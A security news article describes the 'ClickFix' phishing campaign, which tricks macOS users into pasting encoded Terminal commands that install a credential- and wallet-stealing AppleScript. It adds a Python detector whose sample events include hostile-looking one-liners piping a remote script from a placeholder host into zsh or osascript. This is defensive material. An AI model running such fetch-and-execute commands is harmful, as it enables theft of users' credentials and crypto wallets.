“ClickFix” Phishing Campaign Targets macOS Users with Terminal Commands to Steal Credentials and Crypto Wallets

Security researchers have uncovered a new and subtle phishing campaign, dubbed “ClickFix,” that is actively targeting macOS users to steal login credentials, cookies, and cryptocurrency wallet files.

The attack is highly deceptive, leveraging a blend of social engineering and operating system detection to trick victims into manually executing a malicious command in their Terminal.

How the Attack Works

  1. Deception: Users navigating to a compromised website (often impersonating popular trading platforms) are presented with a fake CAPTCHA or “human verification” page that mimics a legitimate Cloudflare security check.
  2. OS-Specific Attack: The attacker customizes the instructions based on the victim’s operating system:
     • Windows users receive innocuous PowerShell instructions.
     • macOS users are instructed to open Terminal, paste a seemingly benign, base64-encoded command, and press Enter.
  3. Payload Execution: When the macOS command is run, it decodes and executes a script that fetches a highly obfuscated AppleScript payload from a remote server.
  4. Data Theft and Exfiltration: The AppleScript performs the core data harvesting activities:
     • It prompts the user for their password to escalate privileges.
     • It scans the Desktop, Documents, and Library folders for sensitive files (e.g., .pdf, .docx, Keychain databases, and Safari artifacts).
     • It enumerates and copies saved credentials, cookies, form history, and encrypted files from major browsers, including MetaMask and Exodus crypto wallet files.
     • The collected data is archived into a .zip file and exfiltrated to the attacker’s command-and-control server.
  5. Evasion: By relying on the victim to manually execute a one-line Terminal command rather than dropping a traditional malware binary, the “ClickFix” method effectively bypasses signature-based antivirus solutions.
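Because the chain above runs through a pasted shell one-liner rather than a dropped binary, the best host-side signal is the command line itself: a base64 decode or a remote fetch piped straight into a shell or osascript. The following detection logic is an added example, not code from the original article or from any vendor; the process events it scans are constructed samples and the rule names are my own.

```python
import re

# Constructed sample process command lines, in the shape an EDR agent or a
# shell-history collector might record them. None are real campaign payloads;
# the base64 string simply decodes to "echo hello".
SAMPLE_EVENTS = [
    "ls -la ~/Documents",
    "echo ZWNobyBoZWxsbw== | base64 -d | sh",
    "echo ZWNobyBoZWxsbw== | base64 --decode | /bin/bash",
    "base64 -d attachment.b64 > attachment.bin",
    "osascript -e 'do shell script \"curl -fsSL https://example.invalid/p.scpt | osascript\"'",
    "curl -fsSL https://example.invalid/x.sh | zsh",
    "git commit -m 'decode base64 in parser'",
]

# macOS base64 historically uses -D for decode; newer builds also accept -d.
DECODE = r"base64\s+(?:-d|-D|--decode)"
SHELL = r"(?:/bin/)?(?:sh|bash|zsh)\b"
FETCH = r"\b(?:curl|wget)\b"

# Each rule requires the suspicious producer to be piped directly into an
# interpreter ("[^|]*\|" keeps the match inside a single pipe segment), so a
# plain "base64 -d file > out" decode is not flagged.
RULES = [
    ("decode_to_shell", re.compile(DECODE + r"[^|]*\|\s*" + SHELL)),
    ("fetch_to_shell", re.compile(FETCH + r"[^|]*\|\s*" + SHELL)),
    ("fetch_to_osascript", re.compile(FETCH + r"[^|]*\|\s*osascript\b")),
    ("osascript_fetch", re.compile(r"\bosascript\b.*" + FETCH)),
]


def flag_events(events):
    """Return [(event, [matching rule names])] for events that hit any rule."""
    hits = []
    for event in events:
        matched = [name for name, rx in RULES if rx.search(event)]
        if matched:
            hits.append((event, matched))
    return hits


if __name__ == "__main__":
    for event, rules in flag_events(SAMPLE_EVENTS):
        print(",".join(rules), "=>", event)
```

In production these patterns belong in the EDR query language or a unified-log (`log stream`) pipeline rather than a script, and a hit on an interactive Terminal session initiated right after a browser visit is a strong ClickFix indicator.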

This campaign, linked to the “Odyssey stealer,” underscores the need for users to be highly skeptical of any website instructing them to copy and paste code into their operating system’s command line.
